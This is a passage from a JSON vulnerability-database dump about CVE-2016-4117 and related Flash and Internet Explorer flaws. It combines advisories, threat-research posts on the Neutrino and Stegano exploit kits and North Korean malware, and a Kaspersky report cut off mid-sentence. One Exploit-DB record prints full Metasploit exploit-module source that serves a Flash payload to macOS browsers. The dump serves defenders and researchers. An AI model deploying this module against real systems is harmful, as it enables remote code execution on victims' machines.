"authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332", "CVE-2015-8651", "CVE-2016-0189", "CVE-2016-1019", "CVE-2016-4117"], "modified": "2016-07-14T20:37:00", "id": "FIREEYE:FAB9D3AA433B8323FF6FA7ABC6AD4069", "href": "https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2017-11-17T14:44:04", "description": "A security researcher recently published [source code](<https://github.com/theori-io/cve-2016-0189>) for a working exploit for CVE-2016-0189 and the Neutrino Exploit Kit (EK) quickly adopted it.\n\nCVE-2016-0189 was originally exploited as a zero-day vulnerability in [targeted attacks in Asia](<http://www.symantec.com/connect/blogs/internet-explorer-zero-day-exploit-used-targeted-attacks-south-korea>). The vulnerability resides within scripting engines in Microsoft\u2019s Internet Explorer (IE) browser, and is exploited to achieve Remote Code Execution (RCE). According to the researcher\u2019s repository, the open source exploit affects IE on at least Windows 10. It is possible that attackers could use or repurpose the attack for earlier versions of Windows.\n\nMicrosoft patched [CVE-2016-0189 in May on Patch Tuesday](<https://technet.microsoft.com/en-us/library/security/ms16-may.aspx>). Applying this patch will protect a system from this exploit.\n\n##### Attack Details \n\n\nThe popular Neutrino EK was quick to adopt this exploit. Neutrino works by embedding multiple exploits into one Shockwave Flash (SWF) file. Once run, the SWF profiles the victim\u2019s system \u2013 shown in Figure 1 \u2013 to determine which of its embedded exploits to use.\n\n\n\nFigure 1. Neutrino EK SWF profiles a victim\n\nNext, it decrypts and runs the applicable exploit, as shown in Figure 2. This is different from most other EKs, in which an earlier HTML/JavaScript stage profiles the browser and selectively downloads exploits from the server.\n\n\n\nFigure 2. Decrypt and embed the selected exploit into an iframe\n\nIn this example, Neutrino embedded exploits for five vulnerabilities that have been patched since May or earlier: three for Adobe Flash Player (CVE-2016-4117, CVE-2016-1019, CVE-2015-8651) and two for Internet Explorer (CVE-2016-0189, CVE-2014-6332). 
CVE-2016-0189 is the newest addition to Neutrino\u2019s arsenal.\n\n##### CVE-2016-0189\n\nThis CVE-2016-0189 vulnerability stems from a failure to put a lock on an array before working on it. This omission can lead to an issue when the array is changed while another function is in the middle of working on it. Memory corruption can occur if the \u201cvalueOf \u201c property of the array is set to a script function that changes the array size, as shown in Figure 3.\n\n\n\nFigure 3. Neutrino setting triggering conditions\n\nAfter Microsoft released the patch, a security researcher compared the original and patched programs to identify the root cause of the vulnerability and create a fully functioning exploit. The exploit embedded within Neutrino is identical to this researcher\u2019s exploit, except for the code that runs after initial control.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-14T16:37:00", "type": "fireeye", "title": "Exploit Kits Quickly Adopt Exploit Thanks to Open Source Release", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019", 
"CVE-2014-6332", "CVE-2016-0189", "CVE-2016-4117", "CVE-2015-8651"], "modified": "2016-07-14T16:37:00", "id": "FIREEYE:0A49354849202DA95FE69EEC5811E6DD", "href": "https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:19", "description": "A security researcher recently published [source code](<https://github.com/theori-io/cve-2016-0189>) for a working exploit for CVE-2016-0189 and the Neutrino Exploit Kit (EK) quickly adopted it.\n\nCVE-2016-0189 was originally exploited as a zero-day vulnerability in [targeted attacks in Asia](<http://www.symantec.com/connect/blogs/internet-explorer-zero-day-exploit-used-targeted-attacks-south-korea>). The vulnerability resides within scripting engines in Microsoft\u2019s Internet Explorer (IE) browser, and is exploited to achieve Remote Code Execution (RCE). According to the researcher\u2019s repository, the open source exploit affects IE on at least Windows 10. It is possible that attackers could use or repurpose the attack for earlier versions of Windows.\n\nMicrosoft patched [CVE-2016-0189 in May on Patch Tuesday](<https://technet.microsoft.com/en-us/library/security/ms16-may.aspx>). Applying this patch will protect a system from this exploit.\n\n##### Attack Details \n\n\nThe popular Neutrino EK was quick to adopt this exploit. Neutrino works by embedding multiple exploits into one Shockwave Flash (SWF) file. Once run, the SWF profiles the victim\u2019s system \u2013 shown in Figure 1 \u2013 to determine which of its embedded exploits to use.\n\n\n\nFigure 1. Neutrino EK SWF profiles a victim\n\nNext, it decrypts and runs the applicable exploit, as shown in Figure 2. This is different from most other EKs, in which an earlier HTML/JavaScript stage profiles the browser and selectively downloads exploits from the server.\n\n\n\nFigure 2. 
Decrypt and embed the selected exploit into an iframe\n\nIn this example, Neutrino embedded exploits for five vulnerabilities that have been patched since May or earlier: three for Adobe Flash Player (CVE-2016-4117, CVE-2016-1019, CVE-2015-8651) and two for Internet Explorer (CVE-2016-0189, CVE-2014-6332). CVE-2016-0189 is the newest addition to Neutrino\u2019s arsenal.\n\n##### CVE-2016-0189\n\nThe CVE-2016-0189 vulnerability stems from the scripting engine failing to lock an array before operating on it. This omission allows the array to be changed while another function is still in the middle of working on it. Memory corruption can occur if the \u201cvalueOf\u201d property of the array is set to a script function that changes the array size, as shown in Figure 3.\n\n\n\nFigure 3. Neutrino setting triggering conditions\n\nAfter Microsoft released the patch, a security researcher compared the original and patched programs to identify the root cause of the vulnerability and create a fully functioning exploit. 
The exploit embedded within Neutrino is identical to this researcher\u2019s exploit, except for the code that runs after initial control.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-14T16:37:00", "type": "fireeye", "title": "Exploit Kits Quickly Adopt Exploit Thanks to Open Source Release", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019", "CVE-2014-6332", "CVE-2016-0189", "CVE-2016-4117", "CVE-2015-8651"], "modified": "2016-07-14T16:37:00", "id": "FIREEYE:94FA42F08227BCEDB46BD7010CC3A45D", "href": "https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "attackerkb": [{"lastseen": "2022-05-13T02:37:51", "description": "Adobe Flash Player 21.0.0.226 and earlier allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in May 2016.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, 
"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-11T00:00:00", "type": "attackerkb", "title": "CVE-2016-4117", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4117"], "modified": "2021-07-27T00:00:00", "id": "AKB:2D60486C-E757-4423-BC79-7E5CE137970D", "href": "https://attackerkb.com/topics/2MuHomkZ0P/cve-2016-4117", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:46:56", "description": "Adobe Flash Player 21.0.0.226 and earlier allows remote attackers to\nexecute arbitrary code via unspecified vectors, as exploited in the wild in\nMay 2016.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-11T00:00:00", "type": "ubuntucve", "title": "CVE-2016-4117", "bulletinFamily": 
"info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4117"], "modified": "2016-05-11T00:00:00", "id": "UB:CVE-2016-4117", "href": "https://ubuntu.com/security/CVE-2016-4117", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhatcve": [{"lastseen": "2021-06-24T23:45:08", "description": "Adobe Flash Player 21.0.0.226 and earlier allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in May 2016.\n", "cvss3": {}, "published": "2016-05-11T09:18:12", "type": "redhatcve", "title": "CVE-2016-4117", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-4117"], "modified": "2021-05-28T01:20:14", "id": "RH:CVE-2016-4117", "href": "https://access.redhat.com/security/cve/cve-2016-4117", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:38:20", "description": "An out of bounds access vulnerability has been reported in Adobe Flash Player. The vulnerability is due to a type-confused parameter in Adobe Flash Player SWF file. 
A remote attacker can exploit this issue by using the out of bounds access for unintended reads, writes or frees \u2013 potentially leading to code corruption, control-flow hijack, or information leak attack.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-13T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Out of Bounds Access Code Corruption (CVE-2016-4117)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4117"], "modified": "2019-03-18T00:00:00", "id": "CPAI-2016-0350", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-01-13T05:33:44", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": 
"2019-02-11T00:00:00", "type": "exploitdb", "title": "Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4117", "2016-4117"], "modified": "2019-02-11T00:00:00", "id": "EDB-ID:46339", "href": "https://www.exploit-db.com/exploits/46339", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion',\r\n 'Description' => %q(\r\n This module exploits a type confusion on Adobe Flash Player, which was\r\n originally found being successfully exploited in the wild. 
This module\r\n has been tested successfully on:\r\n macOS Sierra 10.12.3,\r\n Safari and Adobe Flash Player 21.0.0.182,\r\n Firefox and Adobe Flash Player 21.0.0.182.\r\n ),\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Genwei Jiang', # FireEye original blog details on the vulnerability\r\n 'bcook-r7' # Imported Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2016-4117'],\r\n ['BID', '90505'],\r\n ['URL', 'https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html'],\r\n ['URL', 'http://www.securitytracker.com/id/1035826'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa16-02.html'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb16-15.html'],\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => ['osx'],\r\n 'BrowserRequirements' =>\r\n {\r\n source: /script|headers/i,\r\n os_name: lambda do |os|\r\n os =~ OperatingSystems::Match::MAC_OSX\r\n end,\r\n ua_name: lambda do |ua|\r\n case target.name\r\n when 'Mac OS X'\r\n return true if ua == Msf::HttpClients::SAFARI\r\n return true if ua == Msf::HttpClients::FF\r\n end\r\n\r\n false\r\n end,\r\n flash: lambda do |ver|\r\n case target.name\r\n when 'Mac OS X'\r\n return true if Gem::Version.new(ver) <= Gem::Version.new('21.0.0.182')\r\n end\r\n\r\n false\r\n end\r\n },\r\n 'Targets' =>\r\n [\r\n [\r\n 'Mac OS X', {\r\n 'Platform' => 'osx',\r\n 'Arch' => ARCH_X64\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Apr 27 2016',\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n\r\n super\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n\r\n if request.uri.end_with? 
'swf'\r\n print_status('Sending SWF...')\r\n send_response(cli, @swf, 'Content-Type' => 'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache')\r\n return\r\n end\r\n\r\n print_status('Sending HTML...')\r\n send_exploit_html(cli, exploit_template(cli, target_info), 'Pragma' => 'no-cache')\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(3..7)}.swf\"\r\n target_payload = get_payload(cli, target_info)\r\n b64_payload = Rex::Text.encode_base64(target_payload)\r\n\r\n if target.name.include? 'osx'\r\n platform_id = 'osx'\r\n end\r\n html_template = %(<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" Play=\"true\"/>\r\n </object>\r\n </body>\r\n </html>\r\n )\r\n\r\n return html_template, binding\r\n end\r\n\r\n def create_swf\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-4117', 'msf.swf')\r\n File.binread(path)\r\n end\r\nend", "sourceHref": "https://www.exploit-db.com/download/46339", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:17:58", "description": "[](<https://3.bp.blogspot.com/-LcT8O23njws/WEe8BvRhm_I/AAAAAAAAqeA/D8GOfD7oCSMDAcImuqa7_-oueUq-qym5wCLcB/s1600/stegano-exploit-kit-malware-hacking.png>)\n\nIf you have visited any popular mainstream website over the past two months, your computer may have been infected \u2014 Thanks to a new exploit 
kit discovered by security researchers. \n \nResearchers from antivirus provider ESET released a [report](<http://www.welivesecurity.com/2016/12/06/readers-popular-websites-targeted-stealthy-stegano-exploit-kit-hiding-pixels-malicious-ads/>) on Tuesday stating that they have discovered an exploit kit, dubbed **Stegano**, hiding malicious code in the pixels of banner advertisements that are currently in rotation on several high profile news websites. \n \nStegano originally dates back to 2014, but since early October this year, cyber crooks had managed to get the malicious ads displayed on a variety of unnamed reputable news websites, each with Millions of daily visitors. \n \nStegano derived from the word **[Steganography](<https://thehackernews.com/2015/06/Stegosploit-malware.html>)**, which is a technique of hiding messages and content inside a digital graphic image, making the content impossible to spot with the naked eye. \n \nIn this particular malvertising campaign, operators hide malicious code inside transparent PNG image's Alpha Channel, which defines the transparency of each pixel, by altering the transparency value of several pixels. \n \nThe malvertising campaign operators then packed the altered image as an advertisement and managed to display those malicious ads on several high-profile websites. \n \nAccording to the researchers, the malicious ads promote applications called \"Browser Defense\" and \"Broxu,\" and the methodology makes it tough for ad networks to detect. \n \n\n\n### Here's How the Stegano Attack Works:\n\n \nOnce a user visits a site hosting malicious advertisement, the malicious script embedded in the ad reports information about the victim's computer to the attacker's remote server without any user interaction. \n \nThe malicious code then uses the CVE-2016-0162 vulnerability in Microsoft's Internet Explorer (IE) browser in order to scan the target computer to see if it is running on a malware analyst's machine. 
\n \nAfter verifying the targeted browser, the malicious script redirects the browser to a website that hosts Flash Player exploits for three now-patched Adobe Flash vulnerabilities: CVE-2015-8651, CVE-2016-1019, and CVE-2016-4117. \n\n\n> \"Upon successful exploitation, the executed shell code collects information on installed security products and performs \u2013 as paranoid as the cybercriminals behind this attack \u2013 yet another check to verify that it is not being monitored,\" ESET researchers wrote in a blog post. \"If results are favorable, it will attempt to download the encrypted payload from the same server again, disguised as a gif image.\"\n\nWhen downloaded to the victim's computer, the encrypted payload is then decrypted and launched via regsvr32.exe or rundll32.exe in Microsoft Windows. \n \n\n\n### Just Visit a Site, and You'll be Hacked in Just 2-3 Sec\n\n \nBelow is an ESET infographic that explains the working of Stegano's exploit attack: \n\n\n[](<https://2.bp.blogspot.com/-X5Wqj0LvCm4/WEfDwXzrj9I/AAAAAAAAqeQ/zo2BY0Bq_yE9IiBqIa-fkNdLmnHPtX9WgCLcB/s1600/exploit-kit-working.png>)\n\n \nAll the above operations execute automatically without any user interactions and takes place in the span of just 2-3 seconds. \n \nSo far, the Stegano exploit kit has pushed various trojan downloaders, the Ursnif and Ramnit banking trojans, backdoors, spyware, and file stealers. \n \nThe Stegano exploit kit was initially used in 2014 to target people in the Netherlands, and then in 2015, moved on to residents in the Czech Republic. The latest attack campaign is targeting people in Canada, the UK, Australia, Spain, and Italy. \n \nThe best way to protect yourself against any malvertising campaign is always to make sure you are running updated software and apps. 
Also use reputed antivirus software that can detect such threats before they infect your system.\n", "cvss3": {}, "published": "2016-12-06T21:08:00", "type": "thn", "title": "Hacking Millions with Just an Image \u2014 Recipe: Pixels, Ads & Exploit Kit ", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-0162", "CVE-2016-1019", "CVE-2016-4117", "CVE-2015-8651"], "modified": "2016-12-07T08:09:54", "id": "THN:BF8375E3582DA11921BF468B0D3C4F03", "href": "https://thehackernews.com/2016/12/image-exploit-hacking.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T10:07:00", "description": "[](<https://1.bp.blogspot.com/-hkzXUb-YVK4/WUEpPWtqANI/AAAAAAAAtJM/WCJnuCuE5OEHcguz-fm_ZBsnx23blXhHACLcBGAs/s1600/north-korea-hacking-malware.png>)\n\nThe United States government has released a rare alert about an ongoing, eight-year-long North Korean state-sponsored hacking operation. \n \nThe [joint report](<https://www.us-cert.gov/ncas/alerts/TA17-164A>) from the FBI and U.S. Department of Homeland Security (DHS) provided details on \"**DeltaCharlie**,\" a malware variant used by \"**Hidden Cobra**\" hacking group to infect hundreds of thousands of computers globally as part of its DDoS botnet network. \n \nAccording to the report, the Hidden Cobra group of hackers are believed to be backed by the North Korean government and are known to launch cyber attacks against global institutions, including media organizations, aerospace and financial sectors, and critical infrastructure. \n \nWhile the US government has labeled the North Korean hacking group Hidden Cobra, it is often known as Lazarus Group and Guardians of Peace \u2013 the one allegedly [linked to the devastating WannaCry ransomware](<https://thehackernews.com/2017/05/wannacry-lazarus-north-korea.html>) menace that shut down hospitals and businesses worldwide. 
\n \n\n\n### DeltaCharlie \u2013 DDoS Botnet Malware\n\n \nThe agencies identified [IP addresses](<https://www.us-cert.gov/sites/default/files/publications/TA-17-164A_csv.csv>) with \"high confidence\" associated with \"DeltaCharlie\" \u2013 a DDoS tool which the DHS and FBI believe North Korea uses to launch distributed denial-of-service (DDoS) attacks against its targets. \n \nDeltaCharlie is capable of launching a variety of DDoS attacks on its targets, including [Domain Name System](<https://thehackernews.com/2014/06/dns-flood-ddos-attack-hit-video-gaming.html>) (DNS) attacks, [Network Time Protocol](<https://thehackernews.com/2014/01/Network-Time-Protocol-Reflection-DDoS-Attack-Tool.html>) (NTP) attacks, and Character Generation Protocol (CGP) attacks. \n \nThe botnet malware is capable of downloading executables on the infected systems, updating its own binaries, changing its own configuration in real-time, terminating its processes, and activating and terminating DDoS attacks. \n \nHowever, the DeltaCharlie DDoS malware is not new. \n \nDeltaCharlie was initially reported by Novetta in their 2016 Operation Blockbuster Malware Report [[PDF](<https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf>)], which described this as the third botnet malware from the North Korean hacking group, after DeltaAlpha and DeltaBravo. \n \nOther malware used by Hidden Cobra include [Destover](<https://securelist.com/destover/67985/>), Wild Positron or [Duuzer](<https://www.symantec.com/connect/blogs/duuzer-back-door-trojan-targets-south-korea-take-over-computers>), and [Hangman](<http://telussecuritylabs.com/threats/show/TSL20150910-04>) with sophisticated capabilities, including [DDoS botnets](<https://thehackernews.com/2016/11/ddos-attack-mirai-botnet.html>), keyloggers, remote access tools (RATs), and [wiper malware](<https://thehackernews.com/2013/03/south-korea-cyber-attack-wiper-malware.html>). 
\n \n\n\n### Hidden Cobra's Favorite Vulnerabilities\n\n \nOperating since 2009, Hidden Cobra typically targets systems running older, unsupported versions of Microsoft operating systems, and commonly exploits vulnerabilities in Adobe Flash Player to gain an initial entry point into a victim's machine. \n \nThese are the known vulnerabilities affecting various applications usually exploited by Hidden Cobra: \n\n\n * Hangul Word Processor bug (CVE-2015-6585)\n * Microsoft Silverlight flaw (CVE-2016-0034)\n * Adobe Flash Player 18.0.0.324 and 19.x vulnerability ([CVE-2015-8651](<https://thehackernews.com/2015/12/adobe-flash-security-update.html>))\n * Adobe Flash Player 21.0.0.197 Vulnerability ([CVE-2016-1019](<https://thehackernews.com/2016/04/adobe-flash-update.html>))\n * Adobe Flash Player 21.0.0.226 Vulnerability ([CVE-2016-4117](<https://thehackernews.com/2016/12/image-exploit-hacking.html>))\nThe simplest way to defend against such attacks is always to keep your operating system and installed software and applications up-to-date, and protect your network assets behind a firewall. \n \nSince Adobe Flash Player is prone to many attacks and just today the company [patched nine vulnerabilities in Flash Player](<https://thehackernews.com/2017/06/security-patch-tuesday.html>), you are advised to update or remove it completely from your computer. \n \nThe FBI and DHS have provided numerous indicators of compromise (IOCs), malware descriptions, network signatures, as well as host-based rules (YARA rules) in an attempt to help defenders detect activity conducted by the North Korean state-sponsored hacking group. 
\n\n\n> \"If users or administrators detect the custom tools indicative of HIDDEN COBRA, these tools should be immediately flagged, reported to the DHS National Cybersecurity Communications and Integration Center (NCCIC) or the FBI Cyber Watch (CyWatch), and given highest priority for enhanced mitigation,\" the alert reads.\n\nBesides this, the agencies have also provided a long list of mitigations for users and network administrators, which you can follow [here](<https://www.us-cert.gov/ncas/alerts/TA17-164A>).\n", "cvss3": {}, "published": "2017-06-14T01:23:00", "type": "thn", "title": "US Warns of 'DeltaCharlie' \u2013 A North Korean DDoS Botnet Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-6585", "CVE-2016-1019", "CVE-2016-0034", "CVE-2016-4117", "CVE-2015-8651"], "modified": "2017-06-14T12:23:04", "id": "THN:48EB36B9BBEE6D28A599E0C7CE3BA0C9", "href": "https://thehackernews.com/2017/06/north-korea-hacking-malware.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2018-07-10T10:32:20", "description": "\n\nIn the second quarter of 2017, Kaspersky Lab's Global Research and Analysis Team (GReAT) began publishing summaries of the quarter's private threat intelligence reports, in an effort to make the public aware of the research we have been conducting. This report serves as the latest installment, focusing on the relevant activities that we observed during Q2 2018.\n\nThese summaries are a representative snapshot of what has been discussed in greater detail in our private reports. They aim to highlight the significant events and findings that we feel people should be aware of. For brevity's sake, we are choosing not to publish indicators associated with the reports highlighted. 
However, readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## **Remarkable new findings**\n\nWe are always interested in analyzing new techniques used by existing groups, or in finding new clusters of activity that might lead us to discover new actors. Q2 2018 was very interesting in terms of APT activity, with a remarkable campaign that reminds us how real some of the threats are that we have been predicting over the last few years. In particular, we have warned repeatedly how ideal networking hardware was for targeted attacks, and that we had started seeing the first advanced sets of activity focusing on these devices.\n\nIn terms of well-known groups, **Asian actors** were the most active by far.\n\nLazarus/BlueNoroff [was suspected](<https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/>) of targeting financial institutions in Turkey as part of a bigger cyberespionage campaign. The same actor was also suspected of a [campaign against an online casino](<https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/>) in Latin America that ended in a destructive attack. Based on our telemetry, we further observed Lazarus targeting financial institutions in Asia. Lazarus has accumulated a large collection of artefacts over the last few years, in some cases with heavy code reuse, which makes it possible to link many newly found sets of activity to this actor. One such 